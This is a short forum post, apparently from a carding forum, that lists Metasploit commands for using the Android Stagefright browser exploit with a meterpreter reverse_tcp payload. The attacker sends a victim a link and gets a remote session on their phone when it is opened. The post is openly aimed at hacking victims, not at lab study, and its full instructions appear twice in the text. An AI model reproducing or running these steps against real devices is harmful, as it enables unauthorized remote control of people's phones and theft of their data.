CarderPlanet
Professional
- Messages
- 2,549
- Reaction score
- 730
- Points
- 113
The essence of this hack is that the victim only needs to drop the link and no apk files are needed. Drove
What we need:
1) Kali Linux
2) Kali's built-in metasploit program
Let's start hacking:
1) Open a terminal and write a command to run metasploit -> msfconsole
2) You need to select the exploit (Stagefright) -> use exploit / android / browser / stagefright_mp4_tx3g_64bit
3) You need to specify the parameters of the exploit ->
set SRVHOST your ip (you can find it with the ifconfig command)
set set PAYLOAD linux / armle / meterpreter / reverse_tcp // specify the payload of the exploit
set LHOST your ip // host for the payload
set VERBOSE true
exploit -j // run exploit
4) Your link will be here -> "Using URL: your link"
When the victim opens the link, you will see an open meterpreter session:
Did you like the article?
What we need:
1) Kali Linux
2) Kali's built-in metasploit program
Let's start hacking:
1) Open a terminal and write a command to run metasploit -> msfconsole
2) You need to select the exploit (Stagefright) -> use exploit / android / browser / stagefright_mp4_tx3g_64bit
3) You need to specify the parameters of the exploit ->
set SRVHOST your ip (you can find it with the ifconfig command)
set set PAYLOAD linux / armle / meterpreter / reverse_tcp // specify the payload of the exploit
set LHOST your ip // host for the payload
set VERBOSE true
exploit -j // run exploit
4) Your link will be here -> "Using URL: your link"
When the victim opens the link, you will see an open meterpreter session:
Did you like the article?